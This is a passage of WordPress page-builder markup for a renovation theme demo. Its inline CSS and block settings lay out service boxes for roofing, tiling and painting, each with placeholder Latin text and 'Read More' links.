margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-61ff780f-af32-46b2-9e22-40df4790a340.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-61ff780f-af32-46b2-9e22-40df4790a340.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-61ff780f-af32-46b2-9e22-40df4790a340.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde\"} -->\n<style type=\"text/css\"> .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"e09e3d4d-a9bf-4014-b461-dbc47b884dfa\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"08934182-4560-4a6c-8515-6f6f806e013c\"} -->\n<style type=\"text/css\"> .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"af9e4793-906c-4dfa-bbb9-ebc53b817ade\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-af9e4793-906c-4dfa-bbb9-ebc53b817ade\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d\"} -->\n<style type=\"text/css\"> .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Tiling</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"ac47cadc-3d5a-40f8-bad4-2d7510e7b898\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"5babfb35-1296-4ca0-b5db-01d178d15440\"} -->\n<style type=\"text/css\"> .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img {\n width: 59px; 